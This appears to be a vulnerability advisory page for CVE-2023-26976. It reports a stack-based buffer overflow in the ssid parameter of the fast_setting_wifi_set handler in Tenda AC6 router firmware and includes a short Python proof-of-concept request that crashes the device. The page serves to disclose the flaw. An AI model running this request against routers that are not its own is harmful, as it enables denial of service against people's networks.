Headline

CVE-2023-26976: Vluninfo_Repo/CNVDs/AC6/205_1 at main · Funcy33/Vluninfo_Repo

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function.

1 year ago

CVE

Open in Source

#vulnerability #buffer_overflow #wifi

Tenda Router AC6 Vulnerability

This vulnerability lies in the /goform/fast_setting_wifi_set page which influences the lastest version of Tenda Router AC6_V15.03.05.16. (The latest version is AC6_V15.03.05.19)

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function form_fast_setting_wifi_set.

In function form_fast_setting_wifi_set it reads user provided parameter ssid into src, and this variable is passed into function strcpywithout any length check, which may overflow the stack-based buffers`.

So by requesting the page /goform/fast_setting_wifi_set, the attacker can easily perform a Deny of Service Attack.

POC

import requests

IP = "10.10.10.1"
url = f"http://{IP}/goform/fast_setting_wifi_set?"
url += "ssid=" + "s" * 100

response = requests.get(url)

Timeline

2023-2-15: Report to CVE

Acknowledgment

Credit to @Funcy_kilar from Guangzhou University.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago